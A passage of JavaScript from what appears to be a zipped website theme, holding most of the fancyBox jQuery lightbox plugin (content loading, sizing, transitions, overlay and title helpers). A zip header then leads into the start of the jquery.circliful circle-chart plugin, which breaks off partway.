								return false;
							}
						});
					}
				});
			}

			if ($.fn.mousewheel && current.mouseWheel) {
				F.wrap.bind('mousewheel.fb', function (e, delta, deltaX, deltaY) {
					var target = e.target || null,
						parent = $(target),
						canScroll = false;

					while (parent.length) {
						if (canScroll || parent.is('.fancybox-skin') || parent.is('.fancybox-wrap')) {
							break;
						}

						canScroll = isScrollable( parent[0] );
						parent    = $(parent).parent();
					}

					if (delta !== 0 && !canScroll) {
						if (F.group.length > 1 && !current.canShrink) {
							if (deltaY > 0 || deltaX > 0) {
								F.prev( deltaY > 0 ? 'down' : 'left' );

							} else if (deltaY < 0 || deltaX < 0) {
								F.next( deltaY < 0 ? 'up' : 'right' );
							}

							e.preventDefault();
						}
					}
				});
			}
		},

		trigger: function (event, o) {
			var ret, obj = o || F.coming || F.current;

			if (!obj) {
				return;
			}

			if ($.isFunction( obj[event] )) {
				ret = obj[event].apply(obj, Array.prototype.slice.call(arguments, 1));
			}

			if (ret === false) {
				return false;
			}

			if (obj.helpers) {
				$.each(obj.helpers, function (helper, opts) {
					if (opts && F.helpers[helper] && $.isFunction(F.helpers[helper][event])) {
						F.helpers[helper][event]($.extend(true, {}, F.helpers[helper].defaults, opts), obj);
					}
				});
			}

			D.trigger(event);
		},

		isImage: function (str) {
			return isString(str) && str.match(/(^data:image\/.*,)|(\.(jp(e|g|eg)|gif|png|bmp|webp|svg)((\?|#).*)?$)/i);
		},

		isSWF: function (str) {
			return isString(str) && str.match(/\.(swf)((\?|#).*)?$/i);
		},

		_start: function (index) {
			var coming = {},
				obj,
				href,
				type,
				margin,
				padding;

			index = getScalar( index );
			obj   = F.group[ index ] || null;

			if (!obj) {
				return false;
			}

			coming = $.extend(true, {}, F.opts, obj);

			// Convert margin and padding properties to array - top, right, bottom, left
			margin  = coming.margin;
			padding = coming.padding;

			if ($.type(margin) === 'number') {
				coming.margin = [margin, margin, margin, margin];
			}

			if ($.type(padding) === 'number') {
				coming.padding = [padding, padding, padding, padding];
			}

			// 'modal' propery is just a shortcut
			if (coming.modal) {
				$.extend(true, coming, {
					closeBtn   : false,
					closeClick : false,
					nextClick  : false,
					arrows     : false,
					mouseWheel : false,
					keys       : null,
					helpers: {
						overlay : {
							closeClick : false
						}
					}
				});
			}

			// 'autoSize' property is a shortcut, too
			if (coming.autoSize) {
				coming.autoWidth = coming.autoHeight = true;
			}

			if (coming.width === 'auto') {
				coming.autoWidth = true;
			}

			if (coming.height === 'auto') {
				coming.autoHeight = true;
			}

			/*
			 * Add reference to the group, so it`s possible to access from callbacks, example:
			 * afterLoad : function() {
			 *     this.title = 'Image ' + (this.index + 1) + ' of ' + this.group.length + (this.title ? ' - ' + this.title : '');
			 * }
			 */

			coming.group  = F.group;
			coming.index  = index;

			// Give a chance for callback or helpers to update coming item (type, title, etc)
			F.coming = coming;

			if (false === F.trigger('beforeLoad')) {
				F.coming = null;

				return;
			}

			type = coming.type;
			href = coming.href;

			if (!type) {
				F.coming = null;

				//If we can not determine content type then drop silently or display next/prev item if looping through gallery
				if (F.current && F.router && F.router !== 'jumpto') {
					F.current.index = index;

					return F[ F.router ]( F.direction );
				}

				return false;
			}

			F.isActive = true;

			if (type === 'image' || type === 'swf') {
				coming.autoHeight = coming.autoWidth = false;
				coming.scrolling  = 'visible';
			}

			if (type === 'image') {
				coming.aspectRatio = true;
			}

			if (type === 'iframe' && isTouch) {
				coming.scrolling = 'scroll';
			}

			// Build the neccessary markup
			coming.wrap = $(coming.tpl.wrap).addClass('fancybox-' + (isTouch ? 'mobile' : 'desktop') + ' fancybox-type-' + type + ' fancybox-tmp ' + coming.wrapCSS).appendTo( coming.parent || 'body' );

			$.extend(coming, {
				skin  : $('.fancybox-skin',  coming.wrap),
				outer : $('.fancybox-outer', coming.wrap),
				inner : $('.fancybox-inner', coming.wrap)
			});

			$.each(["Top", "Right", "Bottom", "Left"], function(i, v) {
				coming.skin.css('padding' + v, getValue(coming.padding[ i ]));
			});

			F.trigger('onReady');

			// Check before try to load; 'inline' and 'html' types need content, others - href
			if (type === 'inline' || type === 'html') {
				if (!coming.content || !coming.content.length) {
					return F._error( 'content' );
				}

			} else if (!href) {
				return F._error( 'href' );
			}

			if (type === 'image') {
				F._loadImage();

			} else if (type === 'ajax') {
				F._loadAjax();

			} else if (type === 'iframe') {
				F._loadIframe();

			} else {
				F._afterLoad();
			}
		},

		_error: function ( type ) {
			$.extend(F.coming, {
				type       : 'html',
				autoWidth  : true,
				autoHeight : true,
				minWidth   : 0,
				minHeight  : 0,
				scrolling  : 'no',
				hasError   : type,
				content    : F.coming.tpl.error
			});

			F._afterLoad();
		},

		_loadImage: function () {
			// Reset preload image so it is later possible to check "complete" property
			var img = F.imgPreload = new Image();

			img.onload = function () {
				this.onload = this.onerror = null;

				F.coming.width  = this.width / F.opts.pixelRatio;
				F.coming.height = this.height / F.opts.pixelRatio;

				F._afterLoad();
			};

			img.onerror = function () {
				this.onload = this.onerror = null;

				F._error( 'image' );
			};

			img.src = F.coming.href;

			if (img.complete !== true) {
				F.showLoading();
			}
		},

		_loadAjax: function () {
			var coming = F.coming;

			F.showLoading();

			F.ajaxLoad = $.ajax($.extend({}, coming.ajax, {
				url: coming.href,
				error: function (jqXHR, textStatus) {
					if (F.coming && textStatus !== 'abort') {
						F._error( 'ajax', jqXHR );

					} else {
						F.hideLoading();
					}
				},
				success: function (data, textStatus) {
					if (textStatus === 'success') {
						coming.content = data;

						F._afterLoad();
					}
				}
			}));
		},

		_loadIframe: function() {
			var coming = F.coming,
				iframe = $(coming.tpl.iframe.replace(/\{rnd\}/g, new Date().getTime()))
					.attr('scrolling', isTouch ? 'auto' : coming.iframe.scrolling)
					.attr('src', coming.href);

			// This helps IE
			$(coming.wrap).bind('onReset', function () {
				try {
					$(this).find('iframe').hide().attr('src', '//about:blank').end().empty();
				} catch (e) {}
			});

			if (coming.iframe.preload) {
				F.showLoading();

				iframe.one('load', function() {
					$(this).data('ready', 1);

					// iOS will lose scrolling if we resize
					if (!isTouch) {
						$(this).bind('load.fb', F.update);
					}

					// Without this trick:
					//   - iframe won't scroll on iOS devices
					//   - IE7 sometimes displays empty iframe
					$(this).parents('.fancybox-wrap').width('100%').removeClass('fancybox-tmp').show();

					F._afterLoad();
				});
			}

			coming.content = iframe.appendTo( coming.inner );

			if (!coming.iframe.preload) {
				F._afterLoad();
			}
		},

		_preloadImages: function() {
			var group   = F.group,
				current = F.current,
				len     = group.length,
				cnt     = current.preload ? Math.min(current.preload, len - 1) : 0,
				item,
				i;

			for (i = 1; i <= cnt; i += 1) {
				item = group[ (current.index + i ) % len ];

				if (item.type === 'image' && item.href) {
					new Image().src = item.href;
				}
			}
		},

		_afterLoad: function () {
			var coming   = F.coming,
				previous = F.current,
				placeholder = 'fancybox-placeholder',
				current,
				content,
				type,
				scrolling,
				href,
				embed;

			F.hideLoading();

			if (!coming || F.isActive === false) {
				return;
			}

			if (false === F.trigger('afterLoad', coming, previous)) {
				coming.wrap.stop(true).trigger('onReset').remove();

				F.coming = null;

				return;
			}

			if (previous) {
				F.trigger('beforeChange', previous);

				previous.wrap.stop(true).removeClass('fancybox-opened')
					.find('.fancybox-item, .fancybox-nav')
					.remove();
			}

			F.unbindEvents();

			current   = coming;
			content   = coming.content;
			type      = coming.type;
			scrolling = coming.scrolling;

			$.extend(F, {
				wrap  : current.wrap,
				skin  : current.skin,
				outer : current.outer,
				inner : current.inner,
				current  : current,
				previous : previous
			});

			href = current.href;

			switch (type) {
				case 'inline':
				case 'ajax':
				case 'html':
					if (current.selector) {
						content = $('<div>').html(content).find(current.selector);

					} else if (isQuery(content)) {
						if (!content.data(placeholder)) {
							content.data(placeholder, $('<div class="' + placeholder + '"></div>').insertAfter( content ).hide() );
						}

						content = content.show().detach();

						current.wrap.bind('onReset', function () {
							if ($(this).find(content).length) {
								content.hide().replaceAll( content.data(placeholder) ).data(placeholder, false);
							}
						});
					}
				break;

				case 'image':
					content = current.tpl.image.replace('{href}', href);
				break;

				case 'swf':
					content = '<object id="fancybox-swf" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="100%" height="100%"><param name="movie" value="' + href + '"></param>';
					embed   = '';

					$.each(current.swf, function(name, val) {
						content += '<param name="' + name + '" value="' + val + '"></param>';
						embed   += ' ' + name + '="' + val + '"';
					});

					content += '<embed src="' + href + '" type="application/x-shockwave-flash" width="100%" height="100%"' + embed + '></embed></object>';
				break;
			}

			if (!(isQuery(content) && content.parent().is(current.inner))) {
				current.inner.append( content );
			}

			// Give a chance for helpers or callbacks to update elements
			F.trigger('beforeShow');

			// Set scrolling before calculating dimensions
			current.inner.css('overflow', scrolling === 'yes' ? 'scroll' : (scrolling === 'no' ? 'hidden' : scrolling));

			// Set initial dimensions and start position
			F._setDimension();

			F.reposition();

			F.isOpen = false;
			F.coming = null;

			F.bindEvents();

			if (!F.isOpened) {
				$('.fancybox-wrap').not( current.wrap ).stop(true).trigger('onReset').remove();

			} else if (previous.prevMethod) {
				F.transitions[ previous.prevMethod ]();
			}

			F.transitions[ F.isOpened ? current.nextMethod : current.openMethod ]();

			F._preloadImages();
		},

		_setDimension: function () {
			var viewport   = F.getViewport(),
				steps      = 0,
				canShrink  = false,
				canExpand  = false,
				wrap       = F.wrap,
				skin       = F.skin,
				inner      = F.inner,
				current    = F.current,
				width      = current.width,
				height     = current.height,
				minWidth   = current.minWidth,
				minHeight  = current.minHeight,
				maxWidth   = current.maxWidth,
				maxHeight  = current.maxHeight,
				scrolling  = current.scrolling,
				scrollOut  = current.scrollOutside ? current.scrollbarWidth : 0,
				margin     = current.margin,
				wMargin    = getScalar(margin[1] + margin[3]),
				hMargin    = getScalar(margin[0] + margin[2]),
				wPadding,
				hPadding,
				wSpace,
				hSpace,
				origWidth,
				origHeight,
				origMaxWidth,
				origMaxHeight,
				ratio,
				width_,
				height_,
				maxWidth_,
				maxHeight_,
				iframe,
				body;

			// Reset dimensions so we could re-check actual size
			wrap.add(skin).add(inner).width('auto').height('auto').removeClass('fancybox-tmp');

			wPadding = getScalar(skin.outerWidth(true)  - skin.width());
			hPadding = getScalar(skin.outerHeight(true) - skin.height());

			// Any space between content and viewport (margin, padding, border, title)
			wSpace = wMargin + wPadding;
			hSpace = hMargin + hPadding;

			origWidth  = isPercentage(width)  ? (viewport.w - wSpace) * getScalar(width)  / 100 : width;
			origHeight = isPercentage(height) ? (viewport.h - hSpace) * getScalar(height) / 100 : height;

			if (current.type === 'iframe') {
				iframe = current.content;

				if (current.autoHeight && iframe.data('ready') === 1) {
					try {
						if (iframe[0].contentWindow.document.location) {
							inner.width( origWidth ).height(9999);

							body = iframe.contents().find('body');

							if (scrollOut) {
								body.css('overflow-x', 'hidden');
							}

							origHeight = body.outerHeight(true);
						}

					} catch (e) {}
				}

			} else if (current.autoWidth || current.autoHeight) {
				inner.addClass( 'fancybox-tmp' );

				// Set width or height in case we need to calculate only one dimension
				if (!current.autoWidth) {
					inner.width( origWidth );
				}

				if (!current.autoHeight) {
					inner.height( origHeight );
				}

				if (current.autoWidth) {
					origWidth = inner.width();
				}

				if (current.autoHeight) {
					origHeight = inner.height();
				}

				inner.removeClass( 'fancybox-tmp' );
			}

			width  = getScalar( origWidth );
			height = getScalar( origHeight );

			ratio  = origWidth / origHeight;

			// Calculations for the content
			minWidth  = getScalar(isPercentage(minWidth) ? getScalar(minWidth, 'w') - wSpace : minWidth);
			maxWidth  = getScalar(isPercentage(maxWidth) ? getScalar(maxWidth, 'w') - wSpace : maxWidth);

			minHeight = getScalar(isPercentage(minHeight) ? getScalar(minHeight, 'h') - hSpace : minHeight);
			maxHeight = getScalar(isPercentage(maxHeight) ? getScalar(maxHeight, 'h') - hSpace : maxHeight);

			// These will be used to determine if wrap can fit in the viewport
			origMaxWidth  = maxWidth;
			origMaxHeight = maxHeight;

			if (current.fitToView) {
				maxWidth  = Math.min(viewport.w - wSpace, maxWidth);
				maxHeight = Math.min(viewport.h - hSpace, maxHeight);
			}

			maxWidth_  = viewport.w - wMargin;
			maxHeight_ = viewport.h - hMargin;

			if (current.aspectRatio) {
				if (width > maxWidth) {
					width  = maxWidth;
					height = getScalar(width / ratio);
				}

				if (height > maxHeight) {
					height = maxHeight;
					width  = getScalar(height * ratio);
				}

				if (width < minWidth) {
					width  = minWidth;
					height = getScalar(width / ratio);
				}

				if (height < minHeight) {
					height = minHeight;
					width  = getScalar(height * ratio);
				}

			} else {
				width = Math.max(minWidth, Math.min(width, maxWidth));

				if (current.autoHeight && current.type !== 'iframe') {
					inner.width( width );

					height = inner.height();
				}

				height = Math.max(minHeight, Math.min(height, maxHeight));
			}

			// Try to fit inside viewport (including the title)
			if (current.fitToView) {
				inner.width( width ).height( height );

				wrap.width( width + wPadding );

				// Real wrap dimensions
				width_  = wrap.width();
				height_ = wrap.height();

				if (current.aspectRatio) {
					while ((width_ > maxWidth_ || height_ > maxHeight_) && width > minWidth && height > minHeight) {
						if (steps++ > 19) {
							break;
						}

						height = Math.max(minHeight, Math.min(maxHeight, height - 10));
						width  = getScalar(height * ratio);

						if (width < minWidth) {
							width  = minWidth;
							height = getScalar(width / ratio);
						}

						if (width > maxWidth) {
							width  = maxWidth;
							height = getScalar(width / ratio);
						}

						inner.width( width ).height( height );

						wrap.width( width + wPadding );

						width_  = wrap.width();
						height_ = wrap.height();
					}

				} else {
					width  = Math.max(minWidth,  Math.min(width,  width  - (width_  - maxWidth_)));
					height = Math.max(minHeight, Math.min(height, height - (height_ - maxHeight_)));
				}
			}

			if (scrollOut && scrolling === 'auto' && height < origHeight && (width + wPadding + scrollOut) < maxWidth_) {
				width += scrollOut;
			}

			inner.width( width ).height( height );

			wrap.width( width + wPadding );

			width_  = wrap.width();
			height_ = wrap.height();

			canShrink = (width_ > maxWidth_ || height_ > maxHeight_) && width > minWidth && height > minHeight;
			canExpand = current.aspectRatio ? (width < origMaxWidth && height < origMaxHeight && width < origWidth && height < origHeight) : ((width < origMaxWidth || height < origMaxHeight) && (width < origWidth || height < origHeight));

			$.extend(current, {
				dim : {
					width	: getValue( width_ ),
					height	: getValue( height_ )
				},
				origWidth  : origWidth,
				origHeight : origHeight,
				canShrink  : canShrink,
				canExpand  : canExpand,
				wPadding   : wPadding,
				hPadding   : hPadding,
				wrapSpace  : height_ - skin.outerHeight(true),
				skinSpace  : skin.height() - height
			});

			if (!iframe && current.autoHeight && height > minHeight && height < maxHeight && !canExpand) {
				inner.height('auto');
			}
		},

		_getPosition: function (onlyAbsolute) {
			var current  = F.current,
				viewport = F.getViewport(),
				margin   = current.margin,
				width    = F.wrap.width()  + margin[1] + margin[3],
				height   = F.wrap.height() + margin[0] + margin[2],
				rez      = {
					position: 'absolute',
					top  : margin[0],
					left : margin[3]
				};

			if (current.autoCenter && current.fixed && !onlyAbsolute && height <= viewport.h && width <= viewport.w) {
				rez.position = 'fixed';

			} else if (!current.locked) {
				rez.top  += viewport.y;
				rez.left += viewport.x;
			}

			rez.top  = getValue(Math.max(rez.top,  rez.top  + ((viewport.h - height) * current.topRatio)));
			rez.left = getValue(Math.max(rez.left, rez.left + ((viewport.w - width)  * current.leftRatio)));

			return rez;
		},

		_afterZoomIn: function () {
			var current = F.current;

			if (!current) {
				return;
			}

			F.isOpen = F.isOpened = true;

			F.wrap.css('overflow', 'visible').addClass('fancybox-opened');

			F.update();

			// Assign a click event
			if ( current.closeClick || (current.nextClick && F.group.length > 1) ) {
				F.inner.css('cursor', 'pointer').bind('click.fb', function(e) {
					if (!$(e.target).is('a') && !$(e.target).parent().is('a')) {
						e.preventDefault();

						F[ current.closeClick ? 'close' : 'next' ]();
					}
				});
			}

			// Create a close button
			if (current.closeBtn) {
				$(current.tpl.closeBtn).appendTo(F.skin).bind('click.fb', function(e) {
					e.preventDefault();

					F.close();
				});
			}

			// Create navigation arrows
			if (current.arrows && F.group.length > 1) {
				if (current.loop || current.index > 0) {
					$(current.tpl.prev).appendTo(F.outer).bind('click.fb', F.prev);
				}

				if (current.loop || current.index < F.group.length - 1) {
					$(current.tpl.next).appendTo(F.outer).bind('click.fb', F.next);
				}
			}

			F.trigger('afterShow');

			// Stop the slideshow if this is the last item
			if (!current.loop && current.index === current.group.length - 1) {
				F.play( false );

			} else if (F.opts.autoPlay && !F.player.isActive) {
				F.opts.autoPlay = false;

				F.play();
			}
		},

		_afterZoomOut: function ( obj ) {
			obj = obj || F.current;

			$('.fancybox-wrap').trigger('onReset').remove();

			$.extend(F, {
				group  : {},
				opts   : {},
				router : false,
				current   : null,
				isActive  : false,
				isOpened  : false,
				isOpen    : false,
				isClosing : false,
				wrap   : null,
				skin   : null,
				outer  : null,
				inner  : null
			});

			F.trigger('afterClose', obj);
		}
	});

	/*
	 *	Default transitions
	 */

	F.transitions = {
		getOrigPosition: function () {
			var current  = F.current,
				element  = current.element,
				orig     = current.orig,
				pos      = {},
				width    = 50,
				height   = 50,
				hPadding = current.hPadding,
				wPadding = current.wPadding,
				viewport = F.getViewport();

			if (!orig && current.isDom && element.is(':visible')) {
				orig = element.find('img:first');

				if (!orig.length) {
					orig = element;
				}
			}

			if (isQuery(orig)) {
				pos = orig.offset();

				if (orig.is('img')) {
					width  = orig.outerWidth();
					height = orig.outerHeight();
				}

			} else {
				pos.top  = viewport.y + (viewport.h - height) * current.topRatio;
				pos.left = viewport.x + (viewport.w - width)  * current.leftRatio;
			}

			if (F.wrap.css('position') === 'fixed' || current.locked) {
				pos.top  -= viewport.y;
				pos.left -= viewport.x;
			}

			pos = {
				top     : getValue(pos.top  - hPadding * current.topRatio),
				left    : getValue(pos.left - wPadding * current.leftRatio),
				width   : getValue(width  + wPadding),
				height  : getValue(height + hPadding)
			};

			return pos;
		},

		step: function (now, fx) {
			var ratio,
				padding,
				value,
				prop       = fx.prop,
				current    = F.current,
				wrapSpace  = current.wrapSpace,
				skinSpace  = current.skinSpace;

			if (prop === 'width' || prop === 'height') {
				ratio = fx.end === fx.start ? 1 : (now - fx.start) / (fx.end - fx.start);

				if (F.isClosing) {
					ratio = 1 - ratio;
				}

				padding = prop === 'width' ? current.wPadding : current.hPadding;
				value   = now - padding;

				F.skin[ prop ](  getScalar( prop === 'width' ?  value : value - (wrapSpace * ratio) ) );
				F.inner[ prop ]( getScalar( prop === 'width' ?  value : value - (wrapSpace * ratio) - (skinSpace * ratio) ) );
			}
		},

		zoomIn: function () {
			var current  = F.current,
				startPos = current.pos,
				effect   = current.openEffect,
				elastic  = effect === 'elastic',
				endPos   = $.extend({opacity : 1}, startPos);

			// Remove "position" property that breaks older IE
			delete endPos.position;

			if (elastic) {
				startPos = this.getOrigPosition();

				if (current.openOpacity) {
					startPos.opacity = 0.1;
				}

			} else if (effect === 'fade') {
				startPos.opacity = 0.1;
			}

			F.wrap.css(startPos).animate(endPos, {
				duration : effect === 'none' ? 0 : current.openSpeed,
				easing   : current.openEasing,
				step     : elastic ? this.step : null,
				complete : F._afterZoomIn
			});
		},

		zoomOut: function () {
			var current  = F.current,
				effect   = current.closeEffect,
				elastic  = effect === 'elastic',
				endPos   = {opacity : 0.1};

			if (elastic) {
				endPos = this.getOrigPosition();

				if (current.closeOpacity) {
					endPos.opacity = 0.1;
				}
			}

			F.wrap.animate(endPos, {
				duration : effect === 'none' ? 0 : current.closeSpeed,
				easing   : current.closeEasing,
				step     : elastic ? this.step : null,
				complete : F._afterZoomOut
			});
		},

		changeIn: function () {
			var current   = F.current,
				effect    = current.nextEffect,
				startPos  = current.pos,
				endPos    = { opacity : 1 },
				direction = F.direction,
				distance  = 200,
				field;

			startPos.opacity = 0.1;

			if (effect === 'elastic') {
				field = direction === 'down' || direction === 'up' ? 'top' : 'left';

				if (direction === 'down' || direction === 'right') {
					startPos[ field ] = getValue(getScalar(startPos[ field ]) - distance);
					endPos[ field ]   = '+=' + distance + 'px';

				} else {
					startPos[ field ] = getValue(getScalar(startPos[ field ]) + distance);
					endPos[ field ]   = '-=' + distance + 'px';
				}
			}

			// Workaround for http://bugs.jquery.com/ticket/12273
			if (effect === 'none') {
				F._afterZoomIn();

			} else {
				F.wrap.css(startPos).animate(endPos, {
					duration : current.nextSpeed,
					easing   : current.nextEasing,
					complete : F._afterZoomIn
				});
			}
		},

		changeOut: function () {
			var previous  = F.previous,
				effect    = previous.prevEffect,
				endPos    = { opacity : 0.1 },
				direction = F.direction,
				distance  = 200;

			if (effect === 'elastic') {
				endPos[ direction === 'down' || direction === 'up' ? 'top' : 'left' ] = ( direction === 'up' || direction === 'left' ? '-' : '+' ) + '=' + distance + 'px';
			}

			previous.wrap.animate(endPos, {
				duration : effect === 'none' ? 0 : previous.prevSpeed,
				easing   : previous.prevEasing,
				complete : function () {
					$(this).trigger('onReset').remove();
				}
			});
		}
	};

	/*
	 *	Overlay helper
	 */

	F.helpers.overlay = {
		defaults : {
			closeClick : true,      // if true, fancyBox will be closed when user clicks on the overlay
			speedOut   : 200,       // duration of fadeOut animation
			showEarly  : true,      // indicates if should be opened immediately or wait until the content is ready
			css        : {},        // custom CSS properties
			locked     : !isTouch,  // if true, the content will be locked into overlay
			fixed      : true       // if false, the overlay CSS position property will not be set to "fixed"
		},

		overlay : null,      // current handle
		fixed   : false,     // indicates if the overlay has position "fixed"
		el      : $('html'), // element that contains "the lock"

		// Public methods
		create : function(opts) {
			opts = $.extend({}, this.defaults, opts);

			if (this.overlay) {
				this.close();
			}

			this.overlay = $('<div class="fancybox-overlay"></div>').appendTo( F.coming ? F.coming.parent : opts.parent );
			this.fixed   = false;

			if (opts.fixed && F.defaults.fixed) {
				this.overlay.addClass('fancybox-overlay-fixed');

				this.fixed = true;
			}
		},

		open : function(opts) {
			var that = this;

			opts = $.extend({}, this.defaults, opts);

			if (this.overlay) {
				this.overlay.unbind('.overlay').width('auto').height('auto');

			} else {
				this.create(opts);
			}

			if (!this.fixed) {
				W.bind('resize.overlay', $.proxy( this.update, this) );

				this.update();
			}

			if (opts.closeClick) {
				this.overlay.bind('click.overlay', function(e) {
					if ($(e.target).hasClass('fancybox-overlay')) {
						if (F.isActive) {
							F.close();
						} else {
							that.close();
						}

						return false;
					}
				});
			}

			this.overlay.css( opts.css ).show();
		},

		close : function() {
			var scrollV, scrollH;

			W.unbind('resize.overlay');

			if (this.el.hasClass('fancybox-lock')) {
				$('.fancybox-margin').removeClass('fancybox-margin');

				scrollV = W.scrollTop();
				scrollH = W.scrollLeft();

				this.el.removeClass('fancybox-lock');

				W.scrollTop( scrollV ).scrollLeft( scrollH );
			}

			$('.fancybox-overlay').remove().hide();

			$.extend(this, {
				overlay : null,
				fixed   : false
			});
		},

		// Private, callbacks

		update : function () {
			var width = '100%', offsetWidth;

			// Reset width/height so it will not mess
			this.overlay.width(width).height('100%');

			// jQuery does not return reliable result for IE
			if (IE) {
				offsetWidth = Math.max(document.documentElement.offsetWidth, document.body.offsetWidth);

				if (D.width() > offsetWidth) {
					width = D.width();
				}

			} else if (D.width() > W.width()) {
				width = D.width();
			}

			this.overlay.width(width).height(D.height());
		},

		// This is where we can manipulate DOM, because later it would cause iframes to reload
		onReady : function (opts, obj) {
			var overlay = this.overlay;

			$('.fancybox-overlay').stop(true, true);

			if (!overlay) {
				this.create(opts);
			}

			if (opts.locked && this.fixed && obj.fixed) {
				if (!overlay) {
					this.margin = D.height() > W.height() ? $('html').css('margin-right').replace("px", "") : false;
				}

				obj.locked = this.overlay.append( obj.wrap );
				obj.fixed  = false;
			}

			if (opts.showEarly === true) {
				this.beforeShow.apply(this, arguments);
			}
		},

		beforeShow : function(opts, obj) {
			var scrollV, scrollH;

			if (obj.locked) {
				if (this.margin !== false) {
					$('*').filter(function(){
						return ($(this).css('position') === 'fixed' && !$(this).hasClass("fancybox-overlay") && !$(this).hasClass("fancybox-wrap") );
					}).addClass('fancybox-margin');

					this.el.addClass('fancybox-margin');
				}

				scrollV = W.scrollTop();
				scrollH = W.scrollLeft();

				this.el.addClass('fancybox-lock');

				W.scrollTop( scrollV ).scrollLeft( scrollH );
			}

			this.open(opts);
		},

		onUpdate : function() {
			if (!this.fixed) {
				this.update();
			}
		},

		afterClose: function (opts) {
			// Remove overlay if exists and fancyBox is not opening
			// (e.g., it is not being open using afterClose callback)
			//if (this.overlay && !F.isActive) {
			if (this.overlay && !F.coming) {
				this.overlay.fadeOut(opts.speedOut, $.proxy( this.close, this ));
			}
		}
	};

	/*
	 *	Title helper
	 */

	F.helpers.title = {
		defaults : {
			type     : 'float', // 'float', 'inside', 'outside' or 'over',
			position : 'bottom' // 'top' or 'bottom'
		},

		beforeShow: function (opts) {
			var current = F.current,
				text    = current.title,
				type    = opts.type,
				title,
				target;

			if ($.isFunction(text)) {
				text = text.call(current.element, current);
			}

			if (!isString(text) || $.trim(text) === '') {
				return;
			}

			title = $('<div class="fancybox-title fancybox-title-' + type + '-wrap">' + text + '</div>');

			switch (type) {
				case 'inside':
					target = F.skin;
				break;

				case 'outside':
					target = F.wrap;
				break;

				case 'over':
					target = F.inner;
				break;

				default: // 'float'
					target = F.skin;

					title.appendTo('body');

					if (IE) {
						title.width( title.width() );
					}

					title.wrapInner('<span class="child"></span>');

					//Increase bottom margin so this title will also fit into viewport
					F.current.margin[2] += Math.abs( getScalar(title.css('margin-bottom')) );
				break;
			}

			title[ (opts.position === 'top' ? 'prependTo'  : 'appendTo') ](target);
		}
	};

	// jQuery plugin initialization
	$.fn.fancybox = function (options) {
		var index,
			that     = $(this),
			selector = this.selector || '',
			run      = function(e) {
				var what = $(this).blur(), idx = index, relType, relVal;

				if (!(e.ctrlKey || e.altKey || e.shiftKey || e.metaKey) && !what.is('.fancybox-wrap')) {
					relType = options.groupAttr || 'data-fancybox-group';
					relVal  = what.attr(relType);

					if (!relVal) {
						relType = 'rel';
						relVal  = what.get(0)[ relType ];
					}

					if (relVal && relVal !== '' && relVal !== 'nofollow') {
						what = selector.length ? $(selector) : that;
						what = what.filter('[' + relType + '="' + relVal + '"]');
						idx  = what.index(this);
					}

					options.index = idx;

					// Stop an event from bubbling if everything is fine
					if (F.open(what, options) !== false) {
						e.preventDefault();
					}
				}
			};

		options = options || {};
		index   = options.index || 0;

		if (!selector || options.live === false) {
			that.unbind('click.fb-start').bind('click.fb-start', run);

		} else {
			D.undelegate(selector, 'click.fb-start').delegate(selector + ":not('.fancybox-item, .fancybox-nav')", 'click.fb-start', run);
		}

		this.filter('[data-fancybox-start=1]').trigger('click');

		return this;
	};

	// Tests that need a body at doc ready
	D.ready(function() {
		var w1, w2;

		if ( $.scrollbarWidth === undefined ) {
			// http://benalman.com/projects/jquery-misc-plugins/#scrollbarwidth
			$.scrollbarWidth = function() {
				var parent = $('<div style="width:50px;height:50px;overflow:auto"><div/></div>').appendTo('body'),
					child  = parent.children(),
					width  = child.innerWidth() - child.height( 99 ).innerWidth();

				parent.remove();

				return width;
			};
		}

		if ( $.support.fixedPosition === undefined ) {
			$.support.fixedPosition = (function() {
				var elem  = $('<div style="position:fixed;top:20px;"></div>').appendTo('body'),
					fixed = ( elem[0].offsetTop === 20 || elem[0].offsetTop === 15 );

				elem.remove();

				return fixed;
			}());
		}

		$.extend(F.defaults, {
			scrollbarWidth : $.scrollbarWidth(),
			fixed  : $.support.fixedPosition,
			parent : $('body')
		});

		//Get real width of page scroll-bar
		w1 = $(window).width();

		H.addClass('fancybox-lock-test');

		w2 = $(window).width();

		H.removeClass('fancybox-lock-test');

		$("<style type='text/css'>.fancybox-margin{margin-right:" + (w2 - w1) + "px;}</style>").appendTo("head");
	});

}(window, document, jQuery));PK!f���%�%bizone/js/jquery.circliful.jsnu&1i�"use strict";

(function ($) {

    $.fn.circliful = function (options, callback) {

        var settings = $.extend({
            // These are the defaults.
            startdegree: 0,
            fgcolor: "#556b2f",
            bgcolor: "#eee",
            fill: false,
            width: 15,
            dimension: 200,
            fontsize: 15,
            percent: 50,
            animationstep: 1.0,
            iconsize: '20px',
            iconcolor: '#999',
            border: 'default',
            complete: null,
            bordersize: 10,
            delay: 0
        }, options);

        return this.each(function () {

            var customSettings = ["fgcolor", "bgcolor", "fill", "width", "dimension", "fontsize", "animationstep", "endPercent", "icon", "iconcolor", "iconsize", "border", "startdegree", "bordersize", "delay"];

            var customSettingsObj = {};
            var icon = '';
            var percent;
            var obj = $(this);
            var fill = false;
            var text, info;

            obj.addClass('circliful');

            checkDataAttributes(obj);

            var endPercent = customSettingsObj.endPercent || 0.0;

            if (obj.data('text') != undefined) {
                text = obj.data('text');

                if (obj.data('icon') != undefined) {
                    icon = $('<i></i>')
                        .addClass('fa ' + $(this).data('icon'))
                        .css({
                            'color': customSettingsObj.iconcolor,
                            'font-size': customSettingsObj.iconsize
                        });
                }

                if (obj.data('type') != undefined) {
                    type = $(this).data('type');

                    if (type == 'half') {
                        addCircleText(obj, 'circle-text-half', (customSettingsObj.dimension / 1.45));
                    } else {
                        addCircleText(obj, 'circle-text', customSettingsObj.dimension);
                    }
                } else {
                    addCircleText(obj, 'circle-text', customSettingsObj.dimension);
                }
            }

            if ($(this).data("total") != undefined && $(this).data("part") != undefined) {
                var total = $(this).data("total") / 100;

                percent = (($(this).data("part") / total) / 100).toFixed(3);
                endPercent = ($(this).data("part") / total).toFixed(3);
            } else {
                if ($(this).data("percent") != undefined) {
                    percent = $(this).data("percent") / 100;
                    endPercent = $(this).data("percent");
                } else {
                    percent = settings.percent / 100;
                }
            }

            if ($(this).data('info') != undefined) {
                info = $(this).data('info');

                if ($(this).data('type') != undefined) {
                    type = $(this).data('type');

                    if (type == 'half') {
                        addInfoText(obj, 0.9);
                    } else {
                        addInfoText(obj, 1.25);
                    }
                } else {
                    addInfoText(obj, 1.25);
                }
            }

            $(this).width(customSettingsObj.dimension + 'px');

            var size = customSettingsObj.dimension,
                canvas = $('<canvas></canvas>').attr({
                    width: size,
